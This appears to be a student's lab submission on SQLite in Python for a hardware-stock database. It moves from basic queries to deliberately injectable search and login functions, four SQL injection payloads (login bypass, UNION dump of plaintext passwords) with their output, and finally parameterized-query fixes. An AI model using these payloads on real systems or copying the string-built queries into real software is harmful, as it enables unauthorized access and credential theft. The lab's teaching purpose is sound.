KAITU PETRONILLA JOAN 22nd April 2026
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)


TASK TWO
import sqlite3

# Connect to the database created in Task 1
conn = sqlite3.connect('nyondo_stock.db')
cursor = conn.cursor()

def run_query(label, description, sql):
    print(f"\n--- Query {label}: {description} ---")
    print(f"Executing: {sql}")
    cursor.execute(sql)
    
    # For UPDATE statements (Query G), we need to commit and then verify
    if "UPDATE" in sql.upper():
        conn.commit()
        print("Update successful.")
    else:
        results = cursor.fetchall()
        for row in results:
            print(row)

# [span_1](start_span)TASK 2 QUERIES[span_1](end_span)

# Query A: Get every column of every product
run_query('A', 'All columns', 'SELECT * FROM products')

# Query B: Get only the name and price of all products
run_query('B', 'Name and Price only', 'SELECT name, price FROM products')

# Query C: Get full details of the product with id = 3
run_query('C', 'ID equals 3', 'SELECT * FROM products WHERE id = 3')

# Query D: Find all products whose name contains 'sheet' (partial match)
run_query('D', 'Name contains "sheet"', "SELECT * FROM products WHERE name LIKE '%sheet%'")

# Query E: Get all products sorted by price, highest first
run_query('E', 'Sorted by price (High to Low)', 'SELECT * FROM products ORDER BY price DESC')

# Query F: Get only the 2 most expensive products
run_query('F', 'Top 2 most expensive', 'SELECT * FROM products ORDER BY price DESC LIMIT 2')

# Query G: Update the price of Cement (id=1) to 38,000 then confirm
run_query('G', 'Update Cement price', 'UPDATE products SET price = 38000 WHERE id = 1')

# Final Verification for Query G
print("\n--- Verification for Query G ---")
cursor.execute('SELECT * FROM products WHERE id = 1')
print(cursor.fetchone())

conn.close()

OUTPUT
--- Query A: All columns ---
Executing: SELECT * FROM products
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

--- Query B: Name and Price only ---
Executing: SELECT name, price FROM products
('Cement (bag)', 38000.0)
('Iron Sheet 3m', 110000.0)
('Paint 5L', 60000.0)
('Nails 1kg', 12000.0)
('Timber 2x4', 25000.0)

--- Query C: ID equals 3 ---
Executing: SELECT * FROM products WHERE id = 3
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

--- Query D: Name contains "sheet" ---
Executing: SELECT * FROM products WHERE name LIKE '%sheet%'
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)

--- Query E: Sorted by price (High to Low) ---
Executing: SELECT * FROM products ORDER BY price DESC
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)

--- Query F: Top 2 most expensive ---
Executing: SELECT * FROM products ORDER BY price DESC LIMIT 2
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

--- Query G: Update Cement price ---
Executing: UPDATE products SET price = 38000 WHERE id = 1
Update successful.

--- Verification for Query G ---
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)


task3
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

def search_product(name):
    query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
    print(f'Query: {query}')
    rows = conn.execute(query).fetchall()
    print(f'Result: {rows}\n')
    return rows

def login(username, password):
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    print(f'Query: {query}')
    row = conn.execute(query).fetchone()
    print(f'Result: {row}\n')
    return row



# --- ATTACK CALLS ---
# Add these at the bottom to test the vulnerabilities
print("--- ATTACK 1: Dump all products ---")
search_product("' OR 1=1--")

print("--- ATTACK 2: Login bypass ---")
login("admin'--", "anything")

print("--- ATTACK 3: Always true login ---")
login("' OR '1'='1", "' OR '1'='1")

print("--- ATTACK 4: UNION attack ---")
search_product("' UNION SELECT id, username, password, role FROM users--")


--- ATTACK 1: Dump all products ---
Query: SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (6, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (7, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (8, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (9, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (10, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

--- ATTACK 2: Login bypass ---
Query: SELECT * FROM users WHERE username='admin'--' AND password='anything'
Result: (1, 'admin', 'admin123', 'admin')

--- ATTACK 3: Always true login ---
Query: SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
Result: (1, 'admin', 'admin123', 'admin')

--- ATTACK 4: UNION attack ---
Query: SELECT * FROM products WHERE name LIKE '%' UNION SELECT id, username, password, role FROM users--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (1, 'admin', 'admin123', 'admin'), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (2, 'fatuma', 'pass456', 'attendant'), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (3, 'wasswa', 'pass789', 'manager'), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (4, 'admin', 'admin123', 'admin'), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0), (5, 'fatuma', 'pass456', 'attendant'), (6, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (6, 'wasswa', 'pass789', 'manager'), (7, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (8, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (9, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (10, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

task 4
Query: SELECT * FROM products WHERE name LIKE ?
Result: []

Test 1: None
Query: SELECT * FROM products WHERE name LIKE ?
Result: []

Test 2: None
Query: SELECT * FROM users WHERE username=? AND password=?
Result: None

Test 3: None
Query: SELECT * FROM users WHERE username=? AND password=?
Result: None

Test 4: None, 

Using parameterized queries the ?placeholder, the database now treats the injection payloads as literal
strings rather than executable SQL commands. This effectively neutralizes the attack, as seen by the empty
resultsin the terminal.
in the string, python sends data as one giant string whereas parametrised queries, python sends comman and data separately
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

def search_product_safe(name):
    # SECURE: The '?' placeholder treats input as plain text
    query = "SELECT * FROM products WHERE name LIKE ?"
    # Wrap the search term in % for the LIKE operator
    results = conn.execute(query, (f"%{name}%",)).fetchall()
    print(f"Query: {query}")
    print(f"Result: {results}\n")

def login_safe(username, password):
    # SECURE: Parameterized inputs prevent bypasses
    query = "SELECT * FROM users WHERE username=? AND password=?"
    result = conn.execute(query, (username, password)).fetchone()
    print(f"Query: {query}")
    print(f"Result: {result}\n")

    